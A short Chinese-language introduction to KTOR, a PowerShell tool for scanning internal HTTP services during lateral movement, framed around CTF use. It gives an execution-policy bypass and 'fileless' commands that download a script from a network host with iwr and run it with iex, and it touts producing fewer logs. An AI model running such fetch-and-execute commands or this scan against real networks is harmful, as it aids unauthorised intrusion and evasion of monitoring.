KTOR for windows：無文件落地HTTP服务扫描工具

地址:https://github.com/MartinxMax/KTOR

介紹

KTOR 是一款專為 Linux 橫向滲透設計的工具。透過該工具，您可以快速掃描內部 HTTP 服務，以便進一步進行網路滲透，並實現無檔案落地（fileless）掃描。

在 CTF 中，通常需要利用本機其他埠口的 HTTP 服務或其他主機上的 HTTP 服務來橫向移動並提升權限。

當取得目標機器的低權限後，通常會對內部網路進行進一步的探測；然而透過埠口轉發再進行掃描會相當耗時。為了解決這個問題，KTOR 可用來預先探測存在 HTTP 服務的主機，有效減少日誌產生。

KTOR for Windows

PS> Set-ExecutionPolicy Bypass -Scope Process -Force;.\ktor.ps1

掃描當前主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Local"

掃描其他主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Targets 192.168.0.106 -Ports 80,8080,8000"